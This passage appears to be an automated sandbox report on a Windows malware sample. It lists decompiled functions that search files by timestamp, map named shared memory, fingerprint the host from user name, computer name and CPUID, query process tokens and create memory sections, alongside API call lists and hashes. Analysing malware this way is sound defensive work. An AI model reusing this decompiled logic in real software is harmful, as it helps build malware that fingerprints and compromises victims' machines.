                                                                                                                                                                                                                                                              • Part of subcall function 04874400: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0487442B
                                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04877B4D
                                                                                                                                                                                                                                                            • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04877B61
                                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 04877B78
                                                                                                                                                                                                                                                            • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04877B84
                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,642E2A5C), ref: 04877BC5
                                                                                                                                                                                                                                                            • FindFirstFileA.KERNELBASE(?,?), ref: 04877BDB
                                                                                                                                                                                                                                                            • CompareFileTime.KERNEL32(?,?), ref: 04877BF9
                                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(04877E0E,?), ref: 04877C0D
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(04877E0E), ref: 04877C1A
                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 04877C26
                                                                                                                                                                                                                                                            • CompareFileTime.KERNEL32(?,?), ref: 04877C48
                                                                                                                                                                                                                                                            • StrChrA.SHLWAPI(?,0000002E), ref: 04877C7B
                                                                                                                                                                                                                                                            • memcpy.NTDLL(00000000,?,00000000), ref: 04877CB4
                                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(04877E0E,?), ref: 04877CC9
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(04877E0E), ref: 04877CD6
                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 04877CE2
                                                                                                                                                                                                                                                            • CompareFileTime.KERNEL32(?,?), ref: 04877CF2
                                                                                                                                                                                                                                                            • FindClose.KERNELBASE(04877E0E), ref: 04877D27
                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 04877D39
                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?), ref: 04877D49
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2944988578-0
                                                                                                                                                                                                                                                            • Opcode ID: c2c17a481d7d2beea765896ca108b5155c0172bd3fe023239b181df556210cc4
                                                                                                                                                                                                                                                            • Instruction ID: 954fb0537c26bf1ac7f12c7ca58acf5c1c1c09e4605d4464f935110003d8bd70
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2c17a481d7d2beea765896ca108b5155c0172bd3fe023239b181df556210cc4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC813972900109EFDF119FA5DC98AEEBBB9FF48300F14496AE515E6250E774EA41CFA0
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 69%
                                                                                                                                                                                                                                                            			E004012F4(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                            				struct _FILETIME* _v16;
                                                                                                                                                                                                                                                            				short _v60;
                                                                                                                                                                                                                                                            				struct _FILETIME* _t14;
                                                                                                                                                                                                                                                            				intOrPtr _t15;
                                                                                                                                                                                                                                                            				long _t18;
                                                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                                            				intOrPtr _t31;
                                                                                                                                                                                                                                                            				long _t32;
                                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t31 = __edx;
                                                                                                                                                                                                                                                            				_t14 =  &_v16;
                                                                                                                                                                                                                                                            				GetSystemTimeAsFileTime(_t14);
                                                                                                                                                                                                                                                            				_push(0x192);
                                                                                                                                                                                                                                                            				_push(0x54d38000);
                                                                                                                                                                                                                                                            				_push(_v12);
                                                                                                                                                                                                                                                            				_push(_v16);
                                                                                                                                                                                                                                                            				L00402050();
                                                                                                                                                                                                                                                            				_push(_t14);
                                                                                                                                                                                                                                                            				_v16 = _t14;
                                                                                                                                                                                                                                                            				_t15 =  *0x404150;
                                                                                                                                                                                                                                                            				_push(_t15 + 0x40505e);
                                                                                                                                                                                                                                                            				_push(_t15 + 0x405054);
                                                                                                                                                                                                                                                            				_push(0x16);
                                                                                                                                                                                                                                                            				_push( &_v60);
                                                                                                                                                                                                                                                            				_v12 = _t31;
                                                                                                                                                                                                                                                            				L0040204A();
                                                                                                                                                                                                                                                            				_t18 = _a4;
                                                                                                                                                                                                                                                            				if(_t18 == 0) {
                                                                                                                                                                                                                                                            					_t18 = 0x1000;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t19 = CreateFileMappingW(0xffffffff, 0x404140, 4, 0, _t18,  &_v60); // executed
                                                                                                                                                                                                                                                            				_t34 = _t19;
                                                                                                                                                                                                                                                            				if(_t34 == 0) {
                                                                                                                                                                                                                                                            					_t32 = GetLastError();
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                                                                                                                                                            						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                                                                                                                                                                                                                                            						if(_t22 == 0) {
                                                                                                                                                                                                                                                            							_t32 = GetLastError();
                                                                                                                                                                                                                                                            							if(_t32 != 0) {
                                                                                                                                                                                                                                                            								goto L9;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                            							 *_a8 = _t34;
                                                                                                                                                                                                                                                            							 *_a12 = _t22;
                                                                                                                                                                                                                                                            							_t32 = 0;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						_t32 = 2;
                                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                                            						CloseHandle(_t34);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _t32;
                                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                                            0x004012f4
                                                                                                                                                                                                                                                            0x004012fd
                                                                                                                                                                                                                                                            0x00401301
                                                                                                                                                                                                                                                            0x00401307
                                                                                                                                                                                                                                                            0x0040130c
                                                                                                                                                                                                                                                            0x00401311
                                                                                                                                                                                                                                                            0x00401314
                                                                                                                                                                                                                                                            0x00401317
                                                                                                                                                                                                                                                            0x0040131c
                                                                                                                                                                                                                                                            0x0040131d
                                                                                                                                                                                                                                                            0x00401320
                                                                                                                                                                                                                                                            0x0040132b
                                                                                                                                                                                                                                                            0x00401332
                                                                                                                                                                                                                                                            0x00401336
                                                                                                                                                                                                                                                            0x00401338
                                                                                                                                                                                                                                                            0x00401339
                                                                                                                                                                                                                                                            0x0040133c
                                                                                                                                                                                                                                                            0x00401341
                                                                                                                                                                                                                                                            0x0040134b
                                                                                                                                                                                                                                                            0x0040134d
                                                                                                                                                                                                                                                            0x0040134d
                                                                                                                                                                                                                                                            0x00401361
                                                                                                                                                                                                                                                            0x00401367
                                                                                                                                                                                                                                                            0x0040136b
                                                                                                                                                                                                                                                            0x004013bb
                                                                                                                                                                                                                                                            0x0040136d
                                                                                                                                                                                                                                                            0x00401376
                                                                                                                                                                                                                                                            0x0040138c
                                                                                                                                                                                                                                                            0x00401394
                                                                                                                                                                                                                                                            0x004013a6
                                                                                                                                                                                                                                                            0x004013aa
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00401396
                                                                                                                                                                                                                                                            0x00401399
                                                                                                                                                                                                                                                            0x0040139e
                                                                                                                                                                                                                                                            0x004013a0
                                                                                                                                                                                                                                                            0x004013a0
                                                                                                                                                                                                                                                            0x00401381
                                                                                                                                                                                                                                                            0x00401383
                                                                                                                                                                                                                                                            0x004013ac
                                                                                                                                                                                                                                                            0x004013ad
                                                                                                                                                                                                                                                            0x004013ad
                                                                                                                                                                                                                                                            0x00401376
                                                                                                                                                                                                                                                            0x004013c3

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00401301
                                                                                                                                                                                                                                                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00401317
                                                                                                                                                                                                                                                            • _snwprintf.NTDLL ref: 0040133C
                                                                                                                                                                                                                                                            • CreateFileMappingW.KERNEL32(000000FF,00404140,00000004,00000000,?,?), ref: 00401361
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00401378
                                                                                                                                                                                                                                                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 0040138C
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 004013A4
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004013AD
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 004013B5
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1036254659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1036280390.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1724014008-0
                                                                                                                                                                                                                                                            • Opcode ID: db5fd8da2563314963a4923c9bf7e2001947a96d2039171383599d6bb63f42f8
                                                                                                                                                                                                                                                            • Instruction ID: 50c3509add83a0872ebd8c9e152439831c09e43b2592b5b27f209f36ba87a7c9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db5fd8da2563314963a4923c9bf7e2001947a96d2039171383599d6bb63f42f8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9221C5B2500204FFEB10AF94DC89EAF7BACEB48355F104136FA05F72E0D67899458B68
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                                                                                                            			E0487A446(char __eax, signed int* __esi) {
                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                                                            				long _t34;
                                                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                                                            				long _t50;
                                                                                                                                                                                                                                                            				char _t59;
                                                                                                                                                                                                                                                            				intOrPtr _t61;
                                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                                            				signed int* _t64;
                                                                                                                                                                                                                                                            				char _t65;
                                                                                                                                                                                                                                                            				intOrPtr* _t67;
                                                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                                                            				signed int* _t69;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t69 = __esi;
                                                                                                                                                                                                                                                            				_t65 = __eax;
                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                            				_v12 = __eax;
                                                                                                                                                                                                                                                            				if(__eax == 0) {
                                                                                                                                                                                                                                                            					_t59 =  *0x487d270; // 0xd448b889
                                                                                                                                                                                                                                                            					_v12 = _t59;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t64 = _t69;
                                                                                                                                                                                                                                                            				E048747B0( &_v12, _t64);
                                                                                                                                                                                                                                                            				if(_t65 != 0) {
                                                                                                                                                                                                                                                            					 *_t69 =  *_t69 ^  *0x487d278 ^ 0x4c0ca0ae;
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					GetUserNameW(0,  &_v8); // executed
                                                                                                                                                                                                                                                            					_t50 = _v8;
                                                                                                                                                                                                                                                            					if(_t50 != 0) {
                                                                                                                                                                                                                                                            						_t62 = RtlAllocateHeap( *0x487d238, 0, _t50 + _t50);
                                                                                                                                                                                                                                                            						if(_t62 != 0) {
                                                                                                                                                                                                                                                            							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                                                                                                                                                                                                                            								_t63 = _t62;
                                                                                                                                                                                                                                                            								 *_t69 =  *_t69 ^ E0487A090(_v8 + _v8, _t63);
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							HeapFree( *0x487d238, 0, _t62);
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t61 = __imp__;
                                                                                                                                                                                                                                                            				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                            				GetComputerNameW(0,  &_v8);
                                                                                                                                                                                                                                                            				_t34 = _v8;
                                                                                                                                                                                                                                                            				if(_t34 != 0) {
                                                                                                                                                                                                                                                            					_t68 = RtlAllocateHeap( *0x487d238, 0, _t34 + _t34);
                                                                                                                                                                                                                                                            					if(_t68 != 0) {
                                                                                                                                                                                                                                                            						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                                                                                                                                                                                                                            							_t63 = _t68;
                                                                                                                                                                                                                                                            							_t69[3] = _t69[3] ^ E0487A090(_v8 + _v8, _t63);
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						HeapFree( *0x487d238, 0, _t68);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				asm("cpuid");
                                                                                                                                                                                                                                                            				_t67 =  &_v28;
                                                                                                                                                                                                                                                            				 *_t67 = 1;
                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                                                                                                                                                                                                                            				 *(_t67 + 8) = _t63;
                                                                                                                                                                                                                                                            				 *(_t67 + 0xc) = _t64;
                                                                                                                                                                                                                                                            				_t39 = _v16 ^ _v20 ^ _v28;
                                                                                                                                                                                                                                                            				_t69[1] = _t69[1] ^ _t39;
                                                                                                                                                                                                                                                            				return _t39;
                                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                                            0x0487a446
                                                                                                                                                                                                                                                            0x0487a44e
                                                                                                                                                                                                                                                            0x0487a454
                                                                                                                                                                                                                                                            0x0487a457
                                                                                                                                                                                                                                                            0x0487a45a
                                                                                                                                                                                                                                                            0x0487a45c
                                                                                                                                                                                                                                                            0x0487a461
                                                                                                                                                                                                                                                            0x0487a461
                                                                                                                                                                                                                                                            0x0487a467
                                                                                                                                                                                                                                                            0x0487a469
                                                                                                                                                                                                                                                            0x0487a476
                                                                                                                                                                                                                                                            0x0487a4d7
                                                                                                                                                                                                                                                            0x0487a478
                                                                                                                                                                                                                                                            0x0487a47d
                                                                                                                                                                                                                                                            0x0487a483
                                                                                                                                                                                                                                                            0x0487a488
                                                                                                                                                                                                                                                            0x0487a496
                                                                                                                                                                                                                                                            0x0487a49a
                                                                                                                                                                                                                                                            0x0487a4a9
                                                                                                                                                                                                                                                            0x0487a4b0
                                                                                                                                                                                                                                                            0x0487a4b7
                                                                                                                                                                                                                                                            0x0487a4b7
                                                                                                                                                                                                                                                            0x0487a4c2
                                                                                                                                                                                                                                                            0x0487a4c2
                                                                                                                                                                                                                                                            0x0487a49a
                                                                                                                                                                                                                                                            0x0487a488
                                                                                                                                                                                                                                                            0x0487a4d9
                                                                                                                                                                                                                                                            0x0487a4df
                                                                                                                                                                                                                                                            0x0487a4e9
                                                                                                                                                                                                                                                            0x0487a4eb
                                                                                                                                                                                                                                                            0x0487a4f0
                                                                                                                                                                                                                                                            0x0487a4ff
                                                                                                                                                                                                                                                            0x0487a503
                                                                                                                                                                                                                                                            0x0487a50e
                                                                                                                                                                                                                                                            0x0487a515
                                                                                                                                                                                                                                                            0x0487a51c
                                                                                                                                                                                                                                                            0x0487a51c
                                                                                                                                                                                                                                                            0x0487a528
                                                                                                                                                                                                                                                            0x0487a528
                                                                                                                                                                                                                                                            0x0487a503
                                                                                                                                                                                                                                                            0x0487a531
                                                                                                                                                                                                                                                            0x0487a533
                                                                                                                                                                                                                                                            0x0487a536
                                                                                                                                                                                                                                                            0x0487a538
                                                                                                                                                                                                                                                            0x0487a53b
                                                                                                                                                                                                                                                            0x0487a53e
                                                                                                                                                                                                                                                            0x0487a548
                                                                                                                                                                                                                                                            0x0487a54c
                                                                                                                                                                                                                                                            0x0487a550

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetUserNameW.ADVAPI32(00000000,?), ref: 0487A47D
                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0487A494
                                                                                                                                                                                                                                                            • GetUserNameW.ADVAPI32(00000000,?), ref: 0487A4A1
                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04879194), ref: 0487A4C2
                                                                                                                                                                                                                                                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 0487A4E9
                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0487A4FD
                                                                                                                                                                                                                                                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 0487A50A
                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04879194), ref: 0487A528
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3239747167-0
                                                                                                                                                                                                                                                            • Opcode ID: 7b6985d1b16acab9fb98b5b80c6b4cad9737dfb069499dc7c5340227dd4ca0ce
                                                                                                                                                                                                                                                            • Instruction ID: d380767b58766214fbfd6bbf9d3b3d53a996c4ab656ff17170009beb25a769c3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b6985d1b16acab9fb98b5b80c6b4cad9737dfb069499dc7c5340227dd4ca0ce
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D313A72A00209EFEB14EFA9DC98A6EB7F9FF48314F104969E505D7210DB34EE419B50
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 38%
                                                                                                                                                                                                                                                            			E04877507(char _a4, void* _a8) {
                                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                                                            				char _v40;
                                                                                                                                                                                                                                                            				void* _v44;
                                                                                                                                                                                                                                                            				void** _t33;
                                                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                                                            				void** _t44;
                                                                                                                                                                                                                                                            				intOrPtr* _t47;
                                                                                                                                                                                                                                                            				char _t48;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				_v20 = _a4;
                                                                                                                                                                                                                                                            				_t48 = 0;
                                                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                                                            				_a4 = 0;
                                                                                                                                                                                                                                                            				_v44 = 0x18;
                                                                                                                                                                                                                                                            				_v40 = 0;
                                                                                                                                                                                                                                                            				_v32 = 0;
                                                                                                                                                                                                                                                            				_v36 = 0;
                                                                                                                                                                                                                                                            				_v28 = 0;
                                                                                                                                                                                                                                                            				_v24 = 0;
                                                                                                                                                                                                                                                            				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                                                                                                                                                                                                                            					_t33 =  &_v8;
                                                                                                                                                                                                                                                            					__imp__(_v12, 8, _t33);
                                                                                                                                                                                                                                                            					if(_t33 >= 0) {
                                                                                                                                                                                                                                                            						_t47 = __imp__;
                                                                                                                                                                                                                                                            						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                                                                                                                                                                                                                            						_t44 = E048716F8(_a4);
                                                                                                                                                                                                                                                            						if(_t44 != 0) {
                                                                                                                                                                                                                                                            							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                                                                                                                                                                                                                            							if(_t40 >= 0) {
                                                                                                                                                                                                                                                            								memcpy(_a8,  *_t44, 0x1c);
                                                                                                                                                                                                                                                            								_t48 = 1;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							E048770FF(_t44);
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						NtClose(_v8); // executed
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					NtClose(_v12);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _t48;
                                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                                            0x04877514
                                                                                                                                                                                                                                                            0x04877515
                                                                                                                                                                                                                                                            0x04877516
                                                                                                                                                                                                                                                            0x04877517
                                                                                                                                                                                                                                                            0x04877518
                                                                                                                                                                                                                                                            0x0487751c
                                                                                                                                                                                                                                                            0x04877523
                                                                                                                                                                                                                                                            0x04877532
                                                                                                                                                                                                                                                            0x04877535
                                                                                                                                                                                                                                                            0x04877538
                                                                                                                                                                                                                                                            0x0487753f
                                                                                                                                                                                                                                                            0x04877542
                                                                                                                                                                                                                                                            0x04877545
                                                                                                                                                                                                                                                            0x04877548
                                                                                                                                                                                                                                                            0x0487754b
                                                                                                                                                                                                                                                            0x04877556
                                                                                                                                                                                                                                                            0x04877558
                                                                                                                                                                                                                                                            0x04877561
                                                                                                                                                                                                                                                            0x04877569
                                                                                                                                                                                                                                                            0x0487756b
                                                                                                                                                                                                                                                            0x0487757d
                                                                                                                                                                                                                                                            0x04877587
                                                                                                                                                                                                                                                            0x0487758b
                                                                                                                                                                                                                                                            0x0487759a
                                                                                                                                                                                                                                                            0x0487759e
                                                                                                                                                                                                                                                            0x048775a7
                                                                                                                                                                                                                                                            0x048775af
                                                                                                                                                                                                                                                            0x048775af
                                                                                                                                                                                                                                                            0x048775b1
                                                                                                                                                                                                                                                            0x048775b1
                                                                                                                                                                                                                                                            0x048775b9
                                                                                                                                                                                                                                                            0x048775bf
                                                                                                                                                                                                                                                            0x048775c3
                                                                                                                                                                                                                                                            0x048775c3
                                                                                                                                                                                                                                                            0x048775ce

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 0487754E
                                                                                                                                                                                                                                                            • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04877561
                                                                                                                                                                                                                                                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0487757D
                                                                                                                                                                                                                                                              • Part of subcall function 048716F8: RtlAllocateHeap.NTDLL(00000000,00000000,0487147D), ref: 04871704
                                                                                                                                                                                                                                                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0487759A
                                                                                                                                                                                                                                                            • memcpy.NTDLL(00000000,00000000,0000001C), ref: 048775A7
                                                                                                                                                                                                                                                            • NtClose.NTDLL(?), ref: 048775B9
                                                                                                                                                                                                                                                            • NtClose.NTDLL(00000000), ref: 048775C3
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1037389727.0000000004871000.00000020.00000001.sdmp, Offset: 04870000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037367739.0000000004870000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037415223.000000000487C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037436466.000000000487D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1037448799.000000000487F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2575439697-0
                                                                                                                                                                                                                                                            • Opcode ID: 59a0854a166213ce4b38cbdd941d8b6e289f1424fbccdd17e839667393ffcd0b
                                                                                                                                                                                                                                                            • Instruction ID: 1019b20d2bc904271cb4b6c5f3f6f66193f11b7311f9ba0548dc7e765857af52
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59a0854a166213ce4b38cbdd941d8b6e289f1424fbccdd17e839667393ffcd0b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C211672900219BBDB01AF98CC85EDEBFBDEF08740F104522FA04E6110D7B1EA44DBA1
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                                                            			E004014E8(intOrPtr* __eax, void** _a4) {
                                                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                                            				void* _v24;
                                                                                                                                                                                                                                                            				int _v28;
                                                                                                                                                                                                                                                            				int _v32;
                                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                                            				int _v40;
                                                                                                                                                                                                                                                            				int _v44;
                                                                                                                                                                                                                                                            				void* _v48;
                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                            				long _t34;
                                                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                                            				intOrPtr* _t48;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_t48 = __eax;
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                                            				_v24 =  *((intOrPtr*)(__eax + 4));
                                                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                                                            				_v48 = 0x18;
                                                                                                                                                                                                                                                            				_v44 = 0;
                                                                                                                                                                                                                                                            				_v36 = 0x40;
                                                                                                                                                                                                                                                            				_v40 = 0;
                                                                                                                                                                                                                                                            				_v32 = 0;
                                                                                                                                                                                                                                                            				_v28 = 0;
                                                                                                                                                                                                                                                            				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                                                                                                                                                                                                                            				if(_t34 < 0) {
                                                                                                                                                                                                                                                            					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                            					 *_t48 = _v16;
                                                                                                                                                                                                                                                            					_t39 = E0040183B(_t48,  &_v12); // executed
                                                                                                                                                                                                                                                            					_t47 = _t39;
                                                                                                                                                                                                                                                            					if(_t47 != 0) {
                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                            						memset(_v12, 0, _v24);
                                                                                                                                                                                                                                                            						 *_a4 = _v12;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				return _t47;
